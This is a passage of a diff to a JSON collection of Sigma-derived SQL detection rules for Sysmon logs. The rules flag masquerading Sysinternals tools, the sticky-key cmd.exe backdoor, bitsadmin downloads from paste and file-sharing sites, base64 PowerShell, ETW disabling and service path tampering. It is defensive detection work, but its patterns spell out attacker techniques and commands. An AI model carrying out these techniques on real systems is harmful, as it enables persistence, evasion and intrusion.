ESCAPE '\\' OR Image LIKE '%\\\\pendmoves.exe' ESCAPE '\\' OR Image LIKE '%\\\\pendmoves64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pipelist.exe' ESCAPE '\\' OR Image LIKE '%\\\\pipelist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\portmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Procmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Procmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\psExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psfile.exe' ESCAPE '\\' OR Image LIKE '%\\\\psfile64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psGetsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\psGetsid64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psInfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\psInfo64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pskill.exe' ESCAPE '\\' OR Image LIKE '%\\\\pskill64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pslist.exe' ESCAPE '\\' OR Image LIKE '%\\\\pslist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psLoggedon.exe' ESCAPE '\\' OR Image LIKE '%\\\\psLoggedon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psping.exe' ESCAPE '\\' OR Image LIKE '%\\\\psping64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psService.exe' ESCAPE '\\' OR Image LIKE '%\\\\psService64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psshutdown.exe' ESCAPE '\\' OR Image LIKE '%\\\\psshutdown64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR Image LIKE '%\\\\pssuspend64.exe' ESCAPE '\\' OR Image LIKE '%\\\\RAMMap.exe' ESCAPE '\\' OR Image LIKE '%\\\\RDCMan.exe' ESCAPE '\\' OR Image LIKE '%\\\\RegDelNull.exe' ESCAPE '\\' OR Image LIKE '%\\\\RegDelNull64.exe' ESCAPE '\\' OR Image LIKE '%\\\\regjump.exe' ESCAPE '\\' OR Image LIKE '%\\\\ru.exe' ESCAPE '\\' OR Image LIKE '%\\\\ru64.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ShareEnum.exe' ESCAPE '\\' OR Image LIKE '%\\\\ShareEnum64.exe' ESCAPE '\\' OR Image LIKE '%\\\\shellRunas.exe' ESCAPE '\\' OR Image LIKE '%\\\\sigcheck.exe' ESCAPE '\\' OR Image LIKE '%\\\\sigcheck64.exe' ESCAPE '\\' OR Image LIKE '%\\\\streams.exe' ESCAPE '\\' OR Image LIKE '%\\\\streams64.exe' ESCAPE '\\' OR Image LIKE '%\\\\strings.exe' ESCAPE '\\' OR Image LIKE '%\\\\strings64.exe' ESCAPE '\\' OR Image LIKE '%\\\\sync.exe' ESCAPE '\\' OR Image LIKE '%\\\\sync64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpvcon.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpvcon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpview.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpview64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Testlimit.exe' ESCAPE '\\' OR Image LIKE '%\\\\Testlimit64.exe' ESCAPE '\\' OR Image LIKE '%\\\\vmmap.exe' ESCAPE '\\' OR Image LIKE '%\\\\vmmap64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Volumeid.exe' ESCAPE '\\' OR Image LIKE '%\\\\Volumeid64.exe' ESCAPE '\\' OR Image LIKE '%\\\\whois.exe' ESCAPE '\\' OR Image LIKE '%\\\\whois64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Winobj.exe' ESCAPE '\\' OR Image LIKE '%\\\\Winobj64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ZoomIt.exe' ESCAPE '\\' OR Image LIKE '%\\\\ZoomIt64.exe' ESCAPE '\\') AND NOT ((Company IN ('Sysinternals - www.sysinternals.com', 'Sysinternals')) OR (Company = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Extexport.exe%' ESCAPE '\\' OR Image LIKE '%\\\\Extexport.exe' ESCAPE '\\' OR OriginalFileName = 'extexport.exe'))" ], - "filename": "proc_creation_win_sysinternals_tools_masquerading.yml" + "filename": "proc_creation_win_lolbin_extexport.yml" }, { - "title": "Persistence Via Sticky Key Backdoor", - "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", + "title": "Rundll32 InstallScreenSaver Execution", + "id": "15bd98ea-55f4-4d37-b09a-e7caa0fa2221", "status": "experimental", - "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", - "author": "Sreeman", + "description": "An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec", "tags": [ - "attack.t1546.008", - "attack.privilege_escalation" + "attack.t1218.011", + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Legitimate installation of a new screensaver" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%InstallScreenSaver%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" + "filename": "proc_creation_win_lolbin_rundll32_installscreensaver.yml" }, { - "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand", - "id": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", + "title": "Remote Access Tool - LogMeIn Execution", + "id": "d85873ef-a0f8-4c48-a53a-6b621f11729d", "status": "test", - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (CommandLine LIKE '%-ModuleName %' ESCAPE '\\' OR CommandLine LIKE '%-ModulePath %' ESCAPE '\\' OR CommandLine LIKE '%-ScriptBlock %' ESCAPE '\\' OR CommandLine LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'LMIGuardianSvc' OR Product = 'LMIGuardianSvc' OR Company = 'LogMeIn, Inc.'))" ], - "filename": "proc_creation_win_powershell_ath_remote_fxv_gpu_disablement_command.yml" + "filename": "proc_creation_win_remote_access_tools_logmein.yml" }, { - "title": "Disable of ETW Trace", - "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", - "status": "test", - "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", - "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", + "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Some legitimate apps use this, but limited." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE '%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_etw_trace_evasion.yml" + "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" }, { - "title": "TAIDOOR RAT DLL Load", - "id": "d1aa3382-abab-446f-96ea-4de52908210b", + "title": "Suspicious Encoded PowerShell Command Line", + "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", "status": "test", - "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", "tags": [ "attack.execution", - "attack.t1055.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_apt_taidoor.yml" - }, - { - "title": "Potential BearLPE Exploitation", - "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", - "status": "test", - "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", - "author": "Olaf Hartong", - "tags": [ - "attack.privilege_escalation", - "attack.t1053.005", - "car.2013-08-001" - ], - "falsepositives": [ - "Unknown" + "attack.t1059.001" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAA%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\' OR CommandLine LIKE '% BA^J e-%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '% -ExecutionPolicy remotesigned %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_other_bearlpe.yml" + "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml" }, { - "title": "RunDLL32 Spawning Explorer", - "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", + "title": "Exchange PowerShell Snap-Ins Usage", + "id": "25676e10-2121-446e-80a4-71ff8506af47", "status": "experimental", - "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", - "author": "elhoim, CD_ROM_", + "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27", + "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1059.001", + "attack.collection", + "attack.t1114" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_spawn_explorer.yml" + "filename": "proc_creation_win_powershell_snapins_hafnium.yml" }, { - "title": "Potential CVE-2022-29072 Exploitation Attempt", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", - "status": "experimental", - "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", - "author": "frack113", + "title": "HackTool - Koadic Execution", + "id": "5cddf373-ef00-4112-ad72-960ac29bac34", + "status": "test", + "description": "Detects command line parameters used by Koadic hack tool", + "author": "wagga, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "cve.2022.29072" + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" - ], - "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" - }, - { - "title": "HackTool - SafetyKatz Execution", - "id": "b1876533-4ed5-4a83-90f3-b8645840a413", - "status": "experimental", - "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1003.001" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" ], + "filename": "proc_creation_win_hktl_koadic.yml" + }, + { + "title": "Powershell Inline Execution From A File", + "id": "ee218c12-627a-4d27-9e30-d6fb2fe22ed2", + "status": "experimental", + "description": "Detects inline execution of PowerShell code from a file", + "author": "frack113", "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command %' ESCAPE '\\' OR CommandLine LIKE '%icm %' ESCAPE '\\') AND (CommandLine LIKE '%cat %' ESCAPE '\\' OR CommandLine LIKE '%get-content %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\') AND CommandLine LIKE '% -raw%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_safetykatz.yml" + "filename": "proc_creation_win_powershell_exec_data_file.yml" }, { - "title": "Windows Defender Download Activity", - "id": "46123129-1024-423e-9fae-43af4a0fa9a5", + "title": "NtdllPipe Like Activity Execution", + "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", "status": "test", - "description": "Detect the use of Windows Defender to download payloads", - "author": "Matthew Matchen", + "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" + "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" }, { - "title": "WMI Persistence - Script Event Consumer", - "id": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", + "title": "Suspicious Service Path Modification", + "id": "138d3531-8793-4f50-a2cd-f291b2863d78", "status": "test", - "description": "Detects WMI script event consumers", - "author": "Thomas Patzke", + "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", + "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence", "attack.privilege_escalation", - "attack.t1546.003" + "attack.t1543.003" ], "falsepositives": [ - "Legitimate event consumers", - "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\' AND ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmi_persistence_script_event_consumer.yml" + "filename": "proc_creation_win_sc_service_path_modification.yml" }, { - "title": "Use of Mftrace.exe", - "id": "3d48c9d3-1aa6-418d-98d3-8fd3c01a564e", + "title": "Stop Windows Service Via Sc.EXE", + "id": "81bcb81b-5b1f-474b-b373-52c871aaa7b1", "status": "experimental", - "description": "The \"Trace log generation tool for Media Foundation Tools\" (Mftrace.exe) can be used to execute arbitrary binaries", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the stopping of a Windows service", + "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Legitimate use for tracing purposes" + "There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR OriginalFileName = 'mftrace.exe') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) OR ParentImage LIKE '%\\\\mftrace.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((OriginalFileName = 'sc.exe' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\') AND NOT ((CommandLine IN ('sc stop KSCWebConsoleMessageQueue', 'sc stop LGHUBUpdaterService') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_mftrace.yml" + "filename": "proc_creation_win_sc_stop_service.yml" }, { - "title": "Exploiting CVE-2019-1388", - "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", - "status": "stable", - "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", + "id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", + "status": "test", + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.defense_evasion", + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Unknown" + "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", + "PsExec installed via Windows Store doesn't contain original filename field (False negative)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE '\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wmic.exe' 